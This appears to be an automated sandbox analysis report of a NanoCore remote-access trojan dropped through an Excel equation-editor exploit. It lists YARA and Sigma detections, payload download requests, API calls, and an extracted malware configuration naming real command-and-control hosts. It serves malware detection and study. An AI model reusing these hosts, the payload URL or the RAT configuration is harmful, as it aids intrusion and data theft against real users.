13.2.RegSvcs.exe.2d0000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.RegSvcs.exe.34b48cd.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x241f8:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x24225:$x2: IClientNetworkHost
6.2.RegSvcs.exe.34b48cd.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x241f8:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x252d3:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x24212:$s5: IClientLoggingHost
6.2.RegSvcs.exe.34b48cd.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Click to see the 104 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 2780, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 97.107.138.110, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2804, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2804, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2860

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 2516, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 2780

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 2516, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 2780

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Found malware configuration

Show sources

Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Virustotal: Detection: 27%			Perma Link
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	ReversingLabs: Detection: 32%

Source: 6.2.RegSvcs.exe.ae0000.4.unpack	Avira: Label: TR/NanoCore.fadte
Source: 6.2.RegSvcs.exe.340000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.2.RegSvcs.exe.2d0000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 97.107.138.110:80

Source: global traffic

DNS query: name: demopicking.renova-sa.net

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 97.107.138.110:443

Networking:

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: ezeani.duckdns.org

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: ezeani.duckdns.org
Source: Malware configuration extractor	URLs: 194.5.98.48

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source: Joe Sandbox View

IP Address: 194.5.98.48 194.5.98.48

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 194.5.98.48:8338

Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/03
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository09
Source: asdERTYgh56F[1].htm.2.dr	String found in binary or memory: https://demopicking.renova-sa.net/asdERTYgh56F.exe

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: demopicking.renova-sa.net

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF2285 InternetQueryDataAvailable,InternetReadFile,

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01006308 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0101D91D OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

Source: RegSvcs.exe, 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0102C7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
